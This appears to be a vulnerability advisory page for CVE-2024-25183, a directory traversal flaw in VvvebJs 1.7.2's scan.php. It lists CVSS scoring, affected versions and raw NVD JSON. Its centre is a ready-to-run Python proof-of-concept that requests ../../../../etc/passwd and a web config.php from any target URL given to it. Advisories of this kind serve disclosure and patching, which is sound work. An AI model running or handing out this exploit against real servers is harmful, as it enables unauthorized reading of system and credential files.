Security Vulnerability Report
中文
CVE-2024-25183 CVSS 7.5 HIGH

CVE-2024-25183

Published: 2025-12-29 21:15:42
Last Modified: 2026-01-02 14:05:51

Description

givanz VvvebJs 1.7.2 is vulnerable to Directory Traversal via scan.php.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vvveb:vvvebjs:1.7.2:*:*:*:*:*:*:* - VULNERABLE
VvvebJs <= 1.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-25183 PoC - VvvebJs Directory Traversal # Target: VvvebJs 1.7.2 scan.php import requests import sys def exploit_directory_traversal(target_url, file_path): """ Exploit directory traversal vulnerability in VvvebJs scan.php Args: target_url: Base URL of the vulnerable application file_path: Path to the file to read (e.g., ../../../../etc/passwd) """ # Construct the vulnerable URL exploit_url = f"{target_url}/scan.php?path={file_path}" print(f"[*] Target: {exploit_url}") try: response = requests.get(exploit_url, timeout=10) if response.status_code == 200: print(f"[+] Request successful!") print(f"[+] Response length: {len(response.text)} bytes") print("\n[+] Response content:") print(response.text[:1000]) # Print first 1000 chars else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2024_25183_poc.py <target_url>") print("Example: python cve_2024_25183_poc.py http://target.com/vvvebjs") sys.exit(1) target = sys.argv[1].rstrip('/') # Test reading /etc/passwd file_to_read = "../../../../etc/passwd" print(f"[*] Attempting to read {file_to_read}") exploit_directory_traversal(target, file_to_read) # Test reading config file config_file = "../../../../var/www/html/config.php" print(f"\n[*] Attempting to read {config_file}") exploit_directory_traversal(target, config_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-25183", "sourceIdentifier": "[email protected]", "published": "2025-12-29T21:15:42.287", "lastModified": "2026-01-02T14:05:50.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "givanz VvvebJs 1.7.2 is vulnerable to Directory Traversal via scan.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vvveb:vvvebjs:1.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "00CE1B8B-C606-4F32-90B5-12910C726E0F"}]}]}], "references": [{"url": "https://gist.github.com/joaoviictorti/db387ef5ea3d35482c5ad4598d945b2f", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}